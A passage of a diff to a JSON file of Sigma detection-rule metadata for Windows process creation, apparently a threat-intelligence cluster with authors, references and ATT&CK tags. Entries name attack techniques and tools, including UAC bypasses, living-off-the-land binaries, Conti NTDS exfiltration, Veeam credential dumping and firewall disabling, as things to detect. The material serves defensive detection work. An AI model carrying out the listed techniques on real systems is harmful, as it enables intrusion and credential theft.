connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "meta": { + "author": "frack113", + "creation_date": "2021/12/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_network_listing_connections.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_listing_connections.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ] + }, + "uuid": "1c67a717-32ba-409b-a45d-0fb704a73a81", + "value": "Suspicious Listing of Network Connections" + }, + { + "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", + "meta": { + "author": "frack113", + "creation_date": "2022/03/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_offlinescannershell.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_offlinescannershell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "02b18447-ea83-4b1b-8805-714a8a34546a", + "value": "Suspicious OfflineScannerShell.exe Execution From Another Folder" + }, + { + "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/18", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_pua_seatbelt.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html", + "https://github.com/GhostPack/Seatbelt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1526", + "attack.t1087", + "attack.t1083" + ] + }, + "uuid": "38646daa-e78f-4ace-9de0-55547b2d30da", + "value": "Seatbelt PUA Tool" + }, + { + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_winsat.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "7a01183d-71a2-46ad-ad5c-acd989ac1793", + "value": "UAC Bypass Abusing Winsat Path Parsing - Process" + }, + { + "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", + "meta": { + "author": "frack113", + "creation_date": "2021/11/15", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_reg_bitlocker.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_bitlocker.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ] + }, + "uuid": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "value": "Suspicious Reg Add BitLocker" + }, + { + "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Legitimate usage of the script by a developer" + ], + "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1535981653239255040", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216.001" + ] + }, + "uuid": "45d3a03d-f441-458c-8883-df101a3bb146", + "value": "Launch-VsDevShell.PS1 Proxy Execution" + }, + { + "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "System administrator usage", + "Anti virus products" + ], + "filename": "proc_creation_win_always_install_elevated_windows_installer.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_always_install_elevated_windows_installer.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", + "value": "Always Install Elevated Windows Installer" + }, + { + "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", + "meta": { + "author": "Nextron Systems", + "creation_date": "2022/06/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sdiagnhost_susp_child.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/", + "https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/", + "https://twitter.com/nao_sec/status/1530196847679401984", + "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1218" + ] + }, + "uuid": "f3d39c45-de1a-4486-a687-ab126124f744", + "value": "Sdiagnhost Calling Suspicious Child Process" + }, + { + "description": "Detect attacker collecting audio via SoundRecorder application.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate audio capture by legitimate user." + ], + "filename": "proc_creation_win_soundrec_audio_capture.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_soundrec_audio_capture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1123" + ] + }, + "uuid": "83865853-59aa-449e-9600-74b9d89a6d6e", + "value": "Audio Capture via SoundRecorder" + }, + { + "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", + "meta": { + "author": "frack113", + "creation_date": "2022/01/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_instalutil.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool", + "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_instalutil.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "d042284c-a296-4988-9be5-f424fadcc28c", + "value": "Suspicious Execution of InstallUtil Without Log" + }, + { + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + ], + "filename": "proc_creation_win_user_discovery_get_aduser.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "1114e048-b69c-4f41-bc20-657245ae6e3f", + "value": "User Discovery And Export Via Get-ADUser Cmdlet" + }, + { + "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", + "meta": { + "author": "FPT.EagleEye Team, wagga", + "creation_date": "2020/12/11", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_susp_shell_spawn_from_mssql.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_mssql.yml" + ], + "tags": [ + "attack.t1505.003", + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "uuid": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "value": "Suspicious Shells Spawn by SQL Server" + }, + { + "description": "Detects specific combinations of encoding methods in the PowerShell command lines", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "creation_date": "2022/07/06", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_powershell_cmdline_susp_comb_methods.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_susp_comb_methods.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "5b572dcf-254b-425c-a8c5-d9af6bea35a6", + "value": "Suspicious Xor PowerShell Command Line" + }, + { + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", + "value": "UAC Bypass Using MSConfig Token Modification - Process" + }, + { + "description": "Detects the execution of AdvancedRun utility", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_advancedrun.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", + "https://twitter.com/splinter_code/status/1483815103279603714", + "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml" + ], + "tags": "No established tags" + }, + "uuid": "d2b749ee-4225-417e-b20e-a8d2193cbb84", + "value": "Suspicious AdvancedRun Execution" + }, + { + "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_new_service_creation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", + "value": "Suspicious New Service Creation" + }, + { + "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "value": "Script Interpreter Execution From Suspicious Folder" + }, + { + "description": "Detects the PowerShell command lines with reversed strings", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "creation_date": "2020/10/11", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/", + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", + "value": "Suspicious PowerShell Cmdline" + }, + { + "description": "Detects usage of hh.exe to execute/download remotely hosted .chm files.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_hh_chm_http.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", + "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_http.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.001" + ] + }, + "uuid": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", + "value": "HH.exe Remote CHM File Execution" + }, + { + "description": "Detects a command used by conti to exfiltrate NTDS", + "meta": { + "author": "Max Altgelt, Tobias Michalski", + "creation_date": "2021/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_malware_conti_7zip.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560" + ] + }, + "uuid": "aa92fd02-09f2-48b0-8a93-864813fb8f41", + "value": "Conti NTDS Exfiltration Command" + }, + { + "description": "Detects attempts to disable the Windows Firewall using PowerShell", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/14", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_firewall_disabled_via_powershell.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_firewall_disabled_via_powershell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "12f6b752-042d-483e-bf9c-915a6d06ad75", + "value": "Windows Firewall Disabled via PowerShell" + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_var.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "27aec9c9-dbb0-4939-8422-1742242471d0", + "value": "Invoke-Obfuscation VAR+ Launcher" + }, + { + "description": "Detects a suspicious svchost process start", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_svchost.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_svchost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", + "value": "Suspicious Svchost Process" + }, + { + "description": "Detects transferring files from system on a server bitstransfer Powershell cmdlets", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_bitstransfer.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bitstransfer.yml" ], "tags": [ "attack.exfiltration", - "attack.t1048" + "attack.persistence", + "attack.t1197" ] }, - "uuid": "99793437-3e16-439b-be0f-078782cf953d", - "value": "Tap Installer Execution" + "uuid": "cd5c8085-4070-4e22-908d-a5b3342deb74", + "value": "Suspicious Bitstransfer via PowerShell" + }, + { + "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "meta": { + "author": "Nasreddine Bencherchali @nas_bench", + "creation_date": "2021/12/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_nt_resource_kit_auditpol_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_nt_resource_kit_auditpol_usage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", + "value": "Suspicious NT Resource Kit Auditpol Usage" + }, + { + "description": "Detects code execution via the Windows Update client (wuauclt)", + "meta": { + "author": "FPT.EagleEye Team", + "creation_date": "2020/10/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_wuauclt.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://dtm.uk/wuauclt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wuauclt.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.execution", + "attack.t1105", + "attack.t1218" + ] + }, + "uuid": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "value": "Windows Update Client LOLBIN" + }, + { + "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_sharp_chisel_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/shantanu561993/SharpChisel", + "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090.001" + ] + }, + "uuid": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "value": "SharpChisel Usage" + }, + { + "description": "Detects the import of the specified file to the registry with regedit.exe.", + "meta": { + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Legitimate import of keys", + "Evernote" + ], + "filename": "proc_creation_win_regedit_import_keys.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ] + }, + "uuid": "73bba97f-a82d-42ce-b315-9182e76c57b1", + "value": "Imports Registry Key From a File" + }, + { + "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", + "meta": { + "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", + "creation_date": "2019/02/22", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_mshta_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997", + "http://blog.sevagas.com/?Hacking-around-HTA-files", + "https://twitter.com/mattifestation/status/1326228491302563846", + "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script", + "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.t1218.005", + "attack.execution", + "attack.t1059.007", + "cve.2020.1599" + ] + }, + "uuid": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", + "value": "MSHTA Suspicious Execution 01" + }, + { + "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_public_folder_parent.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_public_folder_parent.yml" + ], + "tags": "No established tags" + }, + "uuid": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", + "value": "Parent in Public Folder Suspicious Process" + }, + { + "description": "Detects the use of SharpUp, a tool for local privilege escalation", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sharpup.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/GhostPack/SharpUp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharpup.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1615", + "attack.t1569.002", + "attack.t1574.005" + ] + }, + "uuid": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "value": "SharpUp PrivEsc Tool" + }, + { + "description": "Detects dump of credentials in VeeamBackup dbo", + "meta": { + "author": "frack113", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sqlcmd_veeam_dump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html", + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005" + ] + }, + "uuid": "b57ba453-b384-4ab9-9f40-1038086b4e53", + "value": "VeeamBackup Database Credentials Dump" + }, + { + "description": "Uninstall an application with wmic", + "meta": { + "author": "frac113", + "creation_date": "2022/01/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_remove_application.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-10---application-uninstall-using-wmic", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remove_application.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "b53317a0-8acf-4fd1-8de8-a5401e776b96", + "value": "WMI Uninstall An Application" + }, + { + "description": "The OpenWith.exe executes other binary", + "meta": { + "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", + "creation_date": "2019/10/12", + "falsepositive": [ + "Legitimate use of OpenWith.exe by legitimate user" + ], + "filename": "proc_creation_win_susp_openwith.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml", + "https://twitter.com/harr0ey/status/991670870384021504", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_openwith.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", + "value": "OpenWith.exe Executes Specified Binary" + }, + { + "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/01", + "falsepositive": [ + "Some fasle positives could occure with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" + ], + "filename": "proc_creation_win_net_default_accounts_manipulation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", + "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", + "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "5b768e71-86f2-4879-b448-81061cbae951", + "value": "Suspicious Manipulation Of Default Accounts" + }, + { + "description": "load malicious registered COM objects", + "meta": { + "author": "frack113", + "creation_date": "2022/02/13", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_rundll32_registered_com_objects.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md", + "https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_registered_com_objects.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" + ] + }, + "uuid": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "value": "Rundll32 Registered COM Objects" + }, + { + "description": "Detects usage of the copy command to copy files with the .dmp extensions from a remote share", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_copy_dmp_from_share.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copy_dmp_from_share.yml" + ], + "tags": [ + "attack.credential_access" + ] + }, + "uuid": "044ba588-dff4-4918-9808-3f95e8160606", + "value": "Copy DMP Files From Share" + }, + { + "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/23", + "falsepositive": [ + 